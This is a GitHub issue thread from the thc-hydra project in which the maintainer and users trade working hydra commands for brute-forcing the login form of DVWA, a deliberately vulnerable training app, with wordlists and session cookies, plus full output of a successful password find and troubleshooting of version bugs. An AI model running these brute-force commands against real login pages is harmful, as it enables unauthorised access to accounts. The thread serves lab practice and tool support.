thc-hydra
thc-hydra copied to clipboard
vanhauser-thc
SOLUTION: How to solve DVWA /vulnerabilities/brute/
As many people are not able to solve this easily - this is how to do it:
- Log into DVWA (login: admin, password: password)
- Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
-
hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect' - profit
you can replace -p password with with -P and a file containing passwords, e.g. -P passwords.txt
Note: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work. If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.
Unable to make v9.1 working properly on DVWA 1.9 or 1.10. No connection logged on the web server side.
What a poo solution, seriously. I have wasted 6h, with 5 computer science students trying to figure you why it was not working, experienced the same trouble on kali, latest version, on docker, on windows. No mention anywhere on your site about the fact version 9.1 had troubles.
And you ask me why I don't use version 9.2. Seriously ?
De : van Hauser @.> Envoyé : 6 mai 2021 18:48 À : vanhauser-thc/thc-hydra @.> Cc : sochartgit @.>; Mention @.> Objet : Re: [vanhauser-thc/thc-hydra] SOLUTION: How to solve DVWA /vulnerabilities/brute/ (#612)
@sochartgithttps://github.com/sochartgit why dont you use hydra 9.2 then?
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHubhttps://github.com/vanhauser-thc/thc-hydra/issues/612#issuecomment-833924491, or unsubscribehttps://github.com/notifications/unsubscribe-auth/AT2UUS6DTH7XKH4QQE5UNBTTMMMCDANCNFSM4ZAG6UTQ.
@sochartgit There is an entry in the Changelog that says that there is a fix in the http-post module. Please complain to the package maintainer of the distro you are using that they are shipping an old version, that is not my job. The bug only affected 9.1. Next time you have problems with a software I highly recommend to check if there is a new version available.
Naaaa, problem was with http-GET and http-GET-form, no mention anwhere.
De : van Hauser @.> Envoyé : 7 mai 2021 02:48 À : vanhauser-thc/thc-hydra @.> Cc : sochartgit @.>; Mention @.> Objet : Re: [vanhauser-thc/thc-hydra] SOLUTION: How to solve DVWA /vulnerabilities/brute/ (#612)
@sochartgithttps://github.com/sochartgit There is an entry in the Changelog that says that there is a fix in the http-post module. Please complain to the package maintainer of the distro you are using that they are shipping an old version, that is not my job. The bug only affected 9.1. Next time you have problems with a software I highly recommend to check if there is a new version available.
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHubhttps://github.com/vanhauser-thc/thc-hydra/issues/612#issuecomment-834112932, or unsubscribehttps://github.com/notifications/unsubscribe-auth/AT2UUSZMLAZ62FQKZH7PA3TTMOENDANCNFSM4ZAG6UTQ.
that is not only documented but also shown in the proposed solution ...
Any idea why the package is not updated to 9.2 when using apt install hydra? it says the latest version 9.1 is installed
@JohnSt99 that is up to the package maintainer. just check out who is the package maintainer at the distribution you are using. but you could just compile it yourself? that is what I do with most of the important software I am using.
I ended up compiling it myself, but I found it weird that apt in Kali downloads 9.1 almost 2 months after the release. Will keep in mind from now on to check latest versions myself! Maybe you could add that other modules also got fixed in 9.2 because I was about to ignore the latest version until I randomly stumbled on this thread
Come across the same situation and wasting 8h+ of time.
Unfortunately Kali repo still doesn't updated hydra package to the present day 👎 So I also ended up compilling it myself - And hey now it works ;-)
(I know it's been a while, but) this doesn't even work
here is my command
./hydra -L /usr/share/wordlist/rockyou.txt -P /usr/share/wordlist/rockyou.txt "http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low"
But I just tried the command you provided and that one gives the same output:
[ERROR] no valid optional parameter type given: S (or F if you use my command)
true, a PR from a user changed the behaviour. F=/S= now has to be the last parameter. updated the solution.
hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. don't add http or https in front of it, username is the field name of user name, and password is the field name of password. You can find them in source code. Login failed is the message printed on webpage in case you enter a wrong username and password, Login is the name of the login button in the source code. and username.txt and password.txt are the list of usernames and passwords and should be saved in the same directory where you run this code. Good luck
I have a problem in termux.When i use hydra,it shows 'hydra command not found'. What is the solution please reply.
On Sun, Jan 29, 2023, 10:36 AM Khaibrullah Munsef @.***> wrote:
hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. don't add http or https infront of it, username si the field name of user name, and password is the field name of password you can find them in source code. Login failed is the message printed on webpage in case you enter a wrong username and passsword, Login is the name of the login button in the source code. and username.txt and password.txt are the list of usernames and passwords and should be saved in the same directory where you run this code. Good luck
— Reply to this email directly, view it on GitHub https://github.com/vanhauser-thc/thc-hydra/issues/612#issuecomment-1407563435, or unsubscribe https://github.com/notifications/unsubscribe-auth/A5OVSA6D7MNGL3FDFYBLMPDWUX3GVANCNFSM4ZAG6UTQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>
Am trying to but brute force DVWA with the command
hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"but Hydra keep giving below error
[ERROR] no valid optional parameter type given: F@can someone tell me what am doing wrong
It seems the F= or S= parameters need to be at the end, e.g. this works:
$ hydra -I -l admin -p password \
-e ns -F -u -t 4 -w 15 -v -V 127.0.0.1 -s 8000 http-get-form \
"/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}:S=Welcome to the password protected area"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:15:40
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d:S=Welcome to the password protected area
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 3 of 3 [child 2] (0/0)
[8000][http-get-form] host: 127.0.0.1 login: admin password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-01 14:15:41
This fails:
$ hydra -I -l admin -p password \
-e ns -F -u -t 4 -w 15 -v -V 127.0.0.1 -s 8000 http-get-form \
"/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:16:06
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] no valid optional parameter type given: S
Am trying to but brute force DVWA with the command
hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"but Hydra keep giving below error
[ERROR] no valid optional parameter type given: F@can someone tell me what am doing wrong
Check this out first I try
You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F
This seems like a bug in my opinion, what do you guys think?
As many people are not able to solve this easily - this is how to do it:
1. Log into DVWA (login: admin, password: password) 2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.) 3. `hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'` 4. profityou can replace
-p passwordwith with -P and a file containing passwords, e.g.-P passwords.txtNote: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work. If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.
Have you tried this with a username and password file? it thinks all my username/password combinations are correct...to me it looks like it's ignoring the F argument.. (this will look like it works fine if you just run the correct user and pass specifying -l, -p)
Am trying to but brute force DVWA with the command
hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"but Hydra keep giving below error[ERROR] no valid optional parameter type given: F@can someone tell me what am doing wrongCheck this out first I try
You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F
This seems like a bug in my opinion, what do you guys think?
If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example.
When I finish hydra brute force it shows 'valid password no found ' so what i do next. Please reply
On Sun, Jan 29, 2023, 10:30 AM Khaibrullah Munsef @.***> wrote:
use this code: hydra 192.168.10.10 http-form-post "/dvwa/login.php:usernam=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt
— Reply to this email directly, view it on GitHub https://github.com/vanhauser-thc/thc-hydra/issues/612#issuecomment-1407562503, or unsubscribe https://github.com/notifications/unsubscribe-auth/A5OVSA3FP3R5KCEUOVXLWVLWUX2PLANCNFSM4ZAG6UTQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>
I'm having the same issue on a box in Hack the Box. It seems like Hydra just does not evaluate some of the response headers, no matter how you structure your command. I've filed another bug report on it myself.
Hello, I'm new to cybersecurity and am trying to brute force dvwa on low.
I am running this command:
hydra -L usernames.txt -P rockyou.txt -s 80 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223" -I
Between each [ATTEMPT] message in the CLI, i am getting an "[ERROR] Caught unkown error code, exiting!" message. I'm also getting [ERROR] optional parameters must have the format X=value: username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223
Does anyone know as to why this might be happening?
